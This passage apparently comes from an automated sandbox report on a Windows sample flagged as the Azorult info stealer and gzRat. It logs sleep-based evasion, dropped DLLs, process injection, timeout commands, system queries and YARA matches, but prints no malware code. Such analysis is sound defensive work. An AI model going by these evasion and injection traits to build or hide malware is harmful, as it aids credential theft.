              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exe TID: 3232Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exe TID: 3232Thread sleep time: -32000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exe TID: 3428Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exe TID: 1768Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 4824Thread sleep count: 160 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 6844Thread sleep count: 164 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 900Thread sleep count: 165 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\nssdbm3.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0C19552\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00416740 GetSystemInfo,14_2_00416740
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,14_2_004098A0
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408D44 FindFirstFileW,GetFileAttributesW,14_2_00408D44
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0041303C FindFirstFileW,FindNextFileW,FindClose,14_2_0041303C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040989F FindFirstFileW,FindNextFileW,FindClose,14_2_0040989F
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,14_2_004111C4
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,14_2_00414408
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,14_2_00414408
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,14_2_00412D70
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,14_2_00412D70
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00408D3C FindFirstFileW,GetFileAttributesW,14_2_00408D3C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,14_2_00412D70
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0041158C FindFirstFileW,FindNextFileW,FindClose,14_2_0041158C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00411590 FindFirstFileW,FindNextFileW,FindClose,14_2_00411590
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,14_2_00412D9C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,14_2_0040B15C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00407A34 mov eax, dword ptr fs:[00000030h]14_2_00407A34
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeMemory written: C:\Users\user\Desktop\6CJfScEKhr.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Users\user\Desktop\6CJfScEKhr.exe C:\Users\user\Desktop\6CJfScEKhr.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeQueries volume information: C:\Users\user\Desktop\6CJfScEKhr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeQueries volume information: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeQueries volume information: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: GetLocaleInfoA,14_2_00404B4C
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 0_2_04A11590 cpuid 0_2_04A11590
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,14_2_00404C15
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004065CC GetUserNameW,14_2_004065CC

              Stealing of Sensitive Information

              barindex
              Yara detected Azorult
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000002.525349365.0000000004808000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.525326784.00000000047F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 6CJfScEKhr.exe PID: 3216, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 6CJfScEKhr.exe PID: 5640, type: MEMORYSTR
              Yara detected Azorult Info Stealer
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.6CJfScEKhr.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.6CJfScEKhr.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3ab3f70.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.0.6CJfScEKhr.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.403321697.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.403775181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.407150230.0000000003B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.402524127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406249935.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000000.402885895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 6CJfScEKhr.exe PID: 3216, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 6CJfScEKhr.exe PID: 5640, type: MEMORYSTR
              Yara detected gzRat
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPE
